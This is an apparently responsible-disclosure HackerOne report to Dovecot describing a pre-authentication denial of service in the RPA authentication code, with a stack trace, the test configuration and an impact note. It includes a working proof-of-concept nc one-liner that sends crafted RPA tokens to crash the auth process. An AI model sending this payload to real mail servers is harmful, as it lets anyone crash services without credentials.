Open-Xchange: Pre-auth Denial-of-Service in Dovecot RPA implementation

2020-05-05T16:45:25
ID H1:866605
Type hackerone
Reporter orange
Modified 2020-08-13T06:43:44

Description

Hi, Dovecot security team.

I am Orange from DEVCORE security team. We just did a little security audit on the authentication mechanism of Dovecot, and found a buffer over-read in RPA implementation.

In the mech-rpa.c, the function rpa_read_buffer doesn't check that the length could be zero, and pass the zero into p_malloc(...). It reaches the i_panic due to the safety check, and raises the SIGABRT to exit whole the dovecot/auth process.

PoC:

```shell $ ps -ao pid,cmd | grep dovecot/auth 25312 dovecot/auth

$ (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110 +OK Dovecot ready. + + YEkGCWCGSAGG+HMBAQMAIGQRQj/rSuEgBcOqNgYJRgZIbKOIvMFtVmW+dFdYtrc1YWZjNTcxYWQ1ZTNlMTcAC3BvcDNAdWJ1bnR1 -ERR [AUTH] Authentication failed. +OK Logging out

$ ps -ao pid,cmd | grep dovecot/auth 25467 dovecot/auth ```

Stack traces:

``` Legend: code, data, rodata, value Stopped reason: SIGABRT 0xf7fc8079 in __kernel_vsyscall () gdb-peda$ bt

0 0xf7fc8079 in __kernel_vsyscall ()

1 0xf7bcd832 in raise () from /lib/i386-linux-gnu/libc.so.6

2 0xf7bcecc1 in abort () from /lib/i386-linux-gnu/libc.so.6

3 0xf7eb7656 in default_fatal_finish (status=0x0, type=LOG_TYPE_PANIC) at failures.c:459

4 fatal_handler_real (ctx=ctx@entry=0xffb550e4, format=format@entry=0x5666baf7 "Trying to allocate %u bytes",

args=args@entry=0xffb55114 "") at failures.c:471

5 0xf7eb77b4 in i_internal_fatal_handler (ctx=0xffb550e4, format=0x5666baf7 "Trying to allocate %u bytes",

args=0xffb55114 "") at failures.c:848

6 0xf7df6499 in i_panic (format=0x5666baf7 "Trying to allocate %u bytes") at failures.c:523

7 0x5664e236 in p_malloc (size=<optimized out>, pool=<optimized out>) at ../../src/lib/mempool.h:105

8 rpa_read_buffer (buffer=<optimized out>, end=<optimized out>, data=<optimized out>, pool=<optimized out>)

at mech-rpa.c:230

9 rpa_parse_token3 (error=0xffb55140, data_size=<optimized out>, data=<optimized out>, request=<optimized out>)

at mech-rpa.c:283

10 mech_rpa_auth_phase2 (data_size=<optimized out>, data=<optimized out>, auth_request=<optimized out>)

at mech-rpa.c:504

11 mech_rpa_auth_continue (auth_request=<optimized out>, data=<optimized out>, data_size=<optimized out>)

at mech-rpa.c:543

12 0x56641a91 in auth_request_handler_auth_continue (handler=<optimized out>, args=<optimized out>)

at auth-request-handler.c:696

13 0x56632812 in auth_client_handle_line (line=0x5839b106 "CONT\t1\tYBEGCWCGSAGG+HMBAQADQUBBAA==",

conn=&lt;optimized out&gt;) at auth-client-connection.c:228

14 auth_client_input (conn=<optimized out>) at auth-client-connection.c:311

15 0xf7ed4ddb in io_loop_call_io (io=0x5839d640) at ioloop.c:713

16 0xf7ed6e5e in io_loop_handler_run_internal (ioloop=0x583879f0) at ioloop-epoll.c:222

17 0xf7ed4ed2 in io_loop_handler_run (ioloop=0x583879f0) at ioloop.c:765

18 0xf7ed5139 in io_loop_run (ioloop=0x583879f0) at ioloop.c:738

19 0xf7e2d0a5 in master_service_run (service=0x58387920, callback=0x566303b0 <client_connected>)

at master-service.c:809

20 0x5662ff70 in main (argc=<optimized out>, argv=<optimized out>) at main.c:395

21 0xf7bb8e81 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6

22 0x566301a1 in _start ()

```

Environment

We have tested this bug on Dovecot-Core 2.3.10, and our configuration is:

```

2.3.10 (): dovecot.conf

OS: Linux 4.15.0-96-generic x86_64 Ubuntu 18.04.1 LTS

Hostname: ubuntu

auth_mechanisms = plain login rpa default_internal_user = orange default_login_user = orange namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = } passdb { driver = shadow } userdb { driver = passwd } ```

Impact

Denied-of-Service. Please note the crash is before the authentication process, it means an attacker can crash the REMOTE Dovecot server without passwords.